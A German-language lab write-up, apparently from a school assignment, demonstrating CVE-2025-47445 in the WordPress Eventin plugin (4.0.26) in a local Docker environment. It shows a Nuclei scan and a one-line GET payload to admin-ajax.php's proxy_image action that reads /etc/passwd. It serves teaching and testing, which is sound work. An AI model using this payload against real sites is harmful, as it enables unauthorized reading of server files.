
Proof of Concept für CVE-2025-47445
Dieser Proof of Concept basiert auf einer Schulaufgabe, bei der wir ein verwundbares wordpress Plugin finden und die genannte Schwachstelle in einer lokalen kontrollierten Umgebung testen wollten.
| Info | |
|---|---|
| Wordpress plugin: | Wordpress Eventin |
| Plugin version: | 4.0.26 (or older) |
| CVE information: | Project Discovery - Vulnerability library |
| CVEdetails.com | |
| Tools of interest: | Wordfence Lab Environment |
| Docker | |
| Burp Suite | |
| Nuclei |
Das Worfence Docker WordPress Research Lab wird mit zwei verschiedenen Umgebungen geliefert, eine mit einer älteren PHP-Version, wir wählen die neuere.
# In the dockerwp84 folder
docker-compose build
docker-compose up -d
Danach habe ich die Wordpress-Seite über localhost:1337 eingerichtet. Ich lade das Eventin-Plugin, speziell Version 4.0.26, aus dem Plugin-Store herunter und installiere und aktiviere es über die Wordpress-Oberfläche.
Jetzt sollte alles bereit sein.
Ich möchte sehen, ob Nuclei die gesuchte CVE finden kann, also starte ich eine Instanz in einem temporären Docker-Container.
docker run --rm projectdiscovery/nuclei -u http://host.docker.internal:1337
Ich habe Nuclei mehrmals ausgeführt und verschiedene Ergebnisse erhalten, ich bin nicht sicher warum. Aber schließlich findet es die CVE und ein paar andere Dinge, nach denen ich nicht spezifisch gesucht habe.

Um zu sehen, ob ich auf die /etc/passwd-Datei zugreifen kann, füge ich einfach den folgenden Payload in meine GET-Anfrage ein.
/wp-admin/admin-ajax.php?action=proxy_image&url=/etc/passwd
Und es war ein Erfolg.

Dies wurde zu Bildungszwecken durchgeführt.
Stellen Sie sicher, dass Sie Ihre gesamte Software aktualisieren. Täglich werden neue CVEs gefunden.